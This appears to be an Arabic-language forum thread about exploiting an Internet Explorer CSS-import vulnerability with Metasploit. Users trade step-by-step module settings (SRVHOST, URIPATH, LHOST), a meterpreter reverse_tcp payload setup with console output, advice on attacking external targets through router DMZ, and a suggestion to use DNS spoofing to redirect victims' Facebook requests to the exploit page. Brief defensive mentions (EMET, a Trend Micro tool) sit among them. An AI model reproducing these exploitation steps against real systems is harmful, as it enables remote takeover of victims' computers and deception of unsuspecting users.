فيديو يوضح استغلال الثغرة

اشكرك استاذي الغالي زيد
على اطروحاتك المتميزه والجديده

حبيت اسألك :
طرحت شركة Trend Micro مجموعة من الادوات التي تحاول التصدي
لثغرات الزيرو منها اداة Browser Guard 2010
هل نجحت في التصدي لهذه الثغره قبل ترقيعها ؟
اتمنى تجربة الاداة واخبارنا بمدى فاعليتها ؟
http://free.antivirus.com/prevention-tools/

شكراً لك

وين الاستغلال ؟!

أشكرك أخى جزيل الشكر، ولى سؤال بسيط عندما أحاول أستخدمها remote عبر برنامج metasploit تخرج لى الرساله
Exploit exception: The address is already in use (41.00.00.00:8080)
فهل بالإمكان اخبارى كيفية استغلالها remote علامًا بأنى أعمل على أبونتوا 9.10
وشكرًا

وين الملف الhtml الي برفعه على السيرفر؟؟
و ليش بطبق الملف الروبي اذا فيها شل تفتح الcalculater

السلام عليكم
أخي زيد مشكور
ومشكلة الأخ saleh abbas
أخي عندما تشوف خيارات الثغرة
الخيار الأتي
SRVHOST 0.0.0.0 yes The local host to listen on.

لاتغيره خلي على حاله
أما الخيار
URIPATH no The URI to use for this exploit (default is random)

فضع /
set URIPATH /
وتختار البايلود يلي يناسبك
وتضع LHOST
أيبي جهازك
أرجو ان تكون وصلت الفكرة :):)

السلام عليكم
أخي زيد مشكور
ومشكلة الأخ saleh abbas
أخي عندما تشوف خيارات الثغرة
الخيار الأتي
SRVHOST 0.0.0.0 yes The local host to listen on.

لاتغيره خلي على حاله
أما الخيار
URIPATH no The URI to use for this exploit (default is random)

فضع /
set URIPATH /
وتختار البايلود يلي يناسبك
وتضع LHOST
أيبي جهازك
أرجو ان تكون وصلت الفكرة :):)

أشكرك حبيبى وجارى تجربة ذلك،

أخى أنا أريد تجربة ذلك الثغرى على الآبى الخارجى لدى وليس الداخلى فهل هذا ممكن وكيف ؟

أخي saleh abbas
الميتا ع الشبكة الخارجية لحد الأن مجهولة
يعني في أحتمال أكثر من 75% ماتشتغل
لان اتصال الانترنيت يمر عبر أكثر من سيرفر
وفي احتمال ان يوجد جدار الحماية على أحد السيرفرات و يوقف عمل الثغرة
وأحتمال ان الجهاز المستهدف يكون موجود خلف روتر أو مركب جدار حماية
ولكن إذا لم يكن أي شي مم ذكر
يجب أن يكون لديك أيبي حقيقي
وتكون مفعل خاصية DMZ في خصائص الرواتر
تقبل مروري...

وهو كذلك أخى الفاضل، وأعتذر عن كثرة الأسئلة

مشكور أخ زيد على الموضوع, وجزاك الله كل خير ...

نشر الأخ بشار في مجتمع الحماية العربي موضوع عن الحماية من الثغرة بإستعمال الEMET (Enhanced Mitigation Experience Toolkit v2.0) والتي بإستعمالها قد تحد من"إستغلال" الثغرة.
http://goo.gl/vk3Cu


في وقت سابق قام Skypher بنشر مقالة عن صنع ٍShellcodes تقوم بتخطي خاصية "Export address table Address Filter (EAF)" الموجودة في EMET عن طريق إيهام EAF أن من يقوم بإستدعاء الدوال هو العملية نفسها وليس الShellcode.
المزيد :http://goo.gl/v9NAm

دمتم بود

مشكورررررر اخي العزيز

السلام عليكم ورحمة الله وبركاته
اهلاً اخي زيد شرح رائع من شخص مميز
بعض الاستفسارات اتمنى ما تكون ثقيله عليك
...
استغليت الثغرة على جهازي الوهمي : windows xp back 2 or window 7
كان تطبيقي لثغرة هاكذا :
1 - use windows/smb/ms11_xxx_ie_css_import
set payload windows/meterpreter/reverse_tcp - 2
3 - srvhost ip هنا حطيت ايبي الجهاز الوهمي المستهدف ...
4- srvport 8080 لم اغير شيئ منه
5 - set lhost ip الايبي تبع المهاجم كان ايبي ثابت 77.3X.xx.xx
6 - set lport 4444
7 - exploit
كان الرد :
-------------------------------------
[*] Exploit running as background job.

[*] Started reverse handler on 77.3x.xx.xx:4444
[-] Exploit exception: The address is already in use (192.168.99.129:8080).

--------------------------------------------
غيرت set srvhost بـ ip المهاجم ..
فأصبح الرد هاكذا :
--------------------------------------------
[*] Exploit running as background job.

[*] Started reverse handler on 77.30.46.92:4444
[*] Using URL: http://77.3x.xx.xx:8080/35FgrgDa2
[*] Server started.
-------------------------------------------------
فذهبت الى الجهاز الوهمي ( المستهدف )فوضعت الرابط في http://77.3x.xx.xx:8080/35FgrgDa2
المتصفح
فأتاني الرد على metasploit
--------------------------------------------------
[*] Received request for "/35FgrgDa2/"
[*] Checking user agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] Sending windows/smb/ms11_xxx_ie_css_import redirect to 77.30.46.92:48302 (target: Internet Explorer 6)...
[*] Received request for "/35FgrgDa2/QLS4n.html"
[*] Checking user agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] Sending windows/smb/ms11_xxx_ie_css_import HTML to 77.3x.xx.xx:48302 (target: Internet Explorer 6)...
[*] Received request for "/35FgrgDa2/ xECx83x80xECx83x80xECx83x80xECx83x80xECx8
3x80xECx83x80xECx83x80xECx83x80"
[*] Checking user agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] Sending windows/smb/ms11_xxx_ie_css_import CSS to 77.3x.xx.xx:48302 (target: Internet Explorer 6)...

---------------------------------------------------------
بعد الرد لا اعلم ماذا افعل ؟ لماذا لا يتصنت بالميتربيتر وانا وضعت البايلود .؟.؟
وهل الطريقه الثانيه صحيحه ( غيرت set srvhost بـ ip المهاجم .. ) ؟!!!
وهل لها استغلال ثاني remote فقط بأيبي المستهدف ولا داعي للمتصفح ووضع الرابط ؟؟
عذراً لأطالتي في الرد و اتمنى ان لا تكون اسألتي مضايفه لك ..
تحيتي وتقديري .. TaLaL

اولاً اشكرك على سرعة الرد .. واشكرك على تواضعكـ ...
اخي زيد انا لم افتح الرابط بـ firefox في جهاز المستهدف ..!! ولا يوجد على الجهاز الوهمي ابداً ... وهذه صوره تدل .. http://upload.traidnt.net/upfiles/CXV17342.png
هل يمكن ان تكون بسبب طريقة الاتصال في الوهمي !!
صوره توضح اعدادات الاتصال في الوهمي http://upload.traidnt.net/upfiles/WFP17579.png
------------------------
بامكانك عم dns spoofing و تحويل الطلبات لموقع معين مثل facebook الى الصفحة المصابة.
-----------------------
ممكن توضح الفكره هاذي او تشرحها ! < لا داعي لشرحها اذا كان به مضايقه او ثقل عليك >

وشكراً اخي زيد

اخي هل هذه الثغرة يمكن استخدامها بطريقة "ضع رابط الباتش هناا"